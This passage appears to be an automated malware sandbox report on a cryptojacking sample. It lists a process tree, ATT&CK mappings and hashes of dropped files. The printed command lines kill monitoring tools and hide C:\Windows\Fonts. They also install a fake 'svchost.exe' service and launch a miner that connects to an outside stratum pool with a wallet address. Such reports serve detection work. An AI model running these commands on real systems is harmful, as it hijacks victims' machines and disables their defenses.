C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im autoruns.exe /f /T
3⤵
PID:1516

C:\Windows\SysWOW64\taskkill.exe
taskkill /im autoruns.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1932

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im rundll32.exe /f /T
3⤵
PID:1160

C:\Windows\SysWOW64\taskkill.exe
taskkill /im rundll32.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im taskmgr.exe /f /T
3⤵
PID:1724

C:\Windows\SysWOW64\taskkill.exe
taskkill /im taskmgr.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1300

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1884

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1652

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:1576

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1852

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im procexp.exe /f /T
3⤵
PID:1752

C:\Windows\SysWOW64\taskkill.exe
taskkill /im procexp.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1952

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im ProcessHacker.exe /f /T
3⤵
PID:1052

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ProcessHacker.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1792

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:2508

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2736

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2576

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2720

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start Hostserver
3⤵
- Executes dropped EXE
PID:2564

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set Hostserver Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:2556

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set Hostserver Security Accounts Services
3⤵
- Executes dropped EXE
PID:2548

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install Hostserver KvMonXP.exe -o stratum+tcp://l.f2pool.info:443 -u 47QrUBQ4ejMW5wrWXiKUyRcQCZszauGWg9c3SLkzFoBJi45M5yN6gVPjVxSUfjMq4u8vepEejdnxyRQcv4RuFGy25x67433 -p x -k --donate-level=1 --print-time=5 --nicehash
3⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
PID:2540

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1260

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1668

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start Hostserver
3⤵
- Executes dropped EXE
PID:2052

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set Hostserver Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:3064

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set Hostserver Security Accounts Services
3⤵
- Executes dropped EXE
PID:3056

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install Hostserver KvMonXP.exe -o stratum+tcp://l.f2pool.info:443 -u 47QrUBQ4ejMW5wrWXiKUyRcQCZszauGWg9c3SLkzFoBJi45M5yN6gVPjVxSUfjMq4u8vepEejdnxyRQcv4RuFGy25x67433 -p x -k --donate-level=1 --print-time=5 --nicehash
3⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
PID:3048

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:3036

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2200

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2452

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2600

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1976

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2920

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2956

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2916

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2908

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2996

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2984

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3044

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2140

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2544

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2044

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2184

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2108

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:832

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2228

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2292

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2260

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2284

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2248

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2368

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2344

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2372

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2376

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2320

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2348

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2420

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2428

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1484

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2472

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2552

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2536

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2548

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2572

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2488

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2672

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2612

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2484

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2700

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2692

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2724

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2708

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2796

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2508

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2800

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2588

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2856

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2844

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2824

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2884

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2820

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2920

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1424

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2956

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2964

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1716

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2036

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2192

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3040

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1752

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1300

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2224

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2288

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1764

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2248

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2304

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2344

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1068

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2380

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2376

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2348

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2412

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2444

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2416

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2528

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2472

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2608

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2536

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2452

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2572

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2684

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2612

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2524

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2700

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2656

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2724

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2808

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2792

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2708

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2804

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2772

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2856

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2848

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2824

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2556

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2820

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2864

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1516

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2604

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2932

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2988

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2928

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2964

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2968

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3000

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2996

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2088

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2984

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1372

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1036

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2544

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3024

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2540

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3060

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2160

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:848

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2052

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1612

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1660

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1728

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1692

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:916

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1296

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1284

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:832

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3052

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3068

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:696

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1116

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1932

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1596

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1804

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2212

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2176

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:700

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1996

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2120

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2256

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1936

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1412

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1276

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2272

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1468

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2232

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2308

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2224

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1324

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2324

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2364

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2356

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2360

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2340

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2316

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2392

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2412

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2332

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2456

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2644

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1712

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1544

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2776

\??\c:\windows\Fonts\KvMonXP.exe
"KvMonXP.exe" -o stratum+tcp://l.f2pool.info:443 -u 47QrUBQ4ejMW5wrWXiKUyRcQCZszauGWg9c3SLkzFoBJi45M5yN6gVPjVxSUfjMq4u8vepEejdnxyRQcv4RuFGy25x67433 -p x -k --donate-level=1 --print-time=5 --nicehash
2⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
PID:1592

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tem.vbs
Filesize
275B

MD5
4840e58034b78f4d0fa798ac2ffd1d49

SHA1
6616183e04694bd6680889d897cc4fbc61af0dfc

SHA256
97060f6ba35b625b60435fa18f91b755f36d03d8c9140f3ddf24e25bc830f0d9

SHA512
fdaec74527bd31d52b489a9ad01826d87d58abfa9575c446a14362b3cd5efad57357ddf539ff98840bd9532e20eb0aef5e0fdf8f8319695ab6591337863d513c

Download Submit
C:\Windows\Fonts\KvMonXP.exe
Filesize
775KB

MD5
8a8045c0472e3e90257d51a236ff62dd

SHA1
2d9cfd9bfe69e7daf9a695df48467d20904157d6

SHA256
d92cfffbd3060aa141eab23a8792aa05a0494a6323f92d10d457a8f89eab62c2

SHA512
1d65f219dad3fa0762019565300430234e690c8b4b74a941dd82785c75fd70945b1db94684af7aa0238f5d76b4c6ff0195d4f94ad34818868f86f01c1cbe4068

Download Submit
C:\Windows\Fonts\lsass.exe
Filesize
1.4MB

MD5
ec0bc41f1e623de85d1be23c55cc5dd8

SHA1
d1912bc5d7180b89af68fc7996a943df90b4106a

SHA256
0b7585b424e77d63186607a4b1e81d65849ce62e3bd6efd52f2b822378549981

SHA512
ea7aaf463a9fc6d28d116516f7c1f36c814f50dcd35779ae8b897155ef6c17dec25b4a2a0a05a8a518e32f2632fda8821c080b8fe2e27ee7613dcff07c15ed8e

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
f3562c44fc322b78460772ec663b5d78

SHA1
cf5816f1a80a61b5a890232235441b424ab8ffff

SHA256
50ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd

SHA512
